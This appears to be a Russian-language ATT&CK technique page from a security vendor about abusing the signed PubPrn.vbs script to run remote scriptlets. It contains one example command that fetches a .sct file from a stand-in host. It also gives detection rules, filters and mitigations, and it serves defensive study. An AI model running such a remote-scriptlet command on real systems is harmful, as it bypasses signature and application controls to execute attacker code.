T1216.001: Сценарий PubPrn

Злоумышленники могут использовать сценарии PubPrn для удаленного выполнения вредоносных файлов. PubPrn.vbs — это сценарий, написанный на языке Visual Basic, который публикует принтер в доменных службах Active Directory. Сценарий может быть подписан сертификатом Microsoft и, как правило, выполняется через командную оболочку Windows с помощью программы Cscript.exe. Например, следующий код публикует принтер в указанном домене: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.

Злоумышленники могут использовать сценарий PubPrn для выполнения полезных нагрузок, размещенных на удаленных сайтах. Для этого они могут указать во втором параметре script: ссылку на файл сценария с расширением .sct, расположенный на удаленном сервере. Пример команды: pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. Такой подход позволяет злоумышленникам обойти ограничения, связанные с проверкой подписи, и механизмы контроля приложений, которые не отслеживают неправомерное использование этого сценария.

В последних версиях Windows (начиная с 10) используется обновленный сценарий PubPrn.vbs, который предотвращает выполнение кода, размещенного на удаленном ресурсе. В этом сценарии во втором параметре можно указать только протокол LDAP://, по которому, в отличие от script:, нельзя подключиться к удаленному ресурсу с кодом по протоколам HTTP или HTTPS.

Какие продукты Positive Technologies покрывают технику

Как обнаружить

PT NAD при помощи детектирующих правил и фильтров способен обнаруживать артефакты загрузки и удаленного выполнения вредоносных файлов путем злоупотребления функциональностью сценария PubPrn.vbs.

Пример правил обнаружения PT NAD

  • ATTACK [PTsecurity] WScript.Shell Run HTML Code Execution Attempt (sid 10003456)

Примеры фильтров PT NAD

  • files.filename ~ "*.sct"

Способы обнаружения

IDDS0012Источник и компонент данныхСценарий: Выполнение сценарияОписание

Отслеживайте попытки включить поддержку сценариев в системе и рассматривайте их как подозрительные. Если использование сценариев в системе допустимо, но не является типичным, их выполнение вне цикла обновлений или других административных задач должно рассматриваться как подозрительное. По возможности сохраняйте сценарии, записанные в файловой системе, для последующего анализа действий и целей злоумышленников.

IDDS0017Источник и компонент данныхКоманда: Выполнение командОписание

Отслеживайте выполнение команд с аргументами, которые могут использоваться для запуска таких сценариев, как PubPrn.vbs, способных обеспечивать выполнение вредоносных файлов.

IDDS0009Источник и компонент данныхПроцесс: Создание процессаОписание

Отслеживайте использование сценариев, например процессы сервера сценариев cscript, которые могут обеспечивать выполнение вредоносных файлов.

Меры противодействия

IDM1038НазваниеЗащита от выполненияОписание

Некоторые подписанные сценарии, которые могут использоваться для выполнения других программ, могут быть не нужны в конкретной среде. Используйте контроль приложений, настроенный на блокировку выполнения этих сценариев, если они не требуются для данной системы или сети, чтобы предотвратить потенциальное использование злоумышленниками.

IDM1040НазваниеПредотвращение некорректного поведенияОписание

В Windows 10 обновите политики управления приложениями в Защитнике Windows, включив в них правила, блокирующие старые уязвимые версии PubPrn.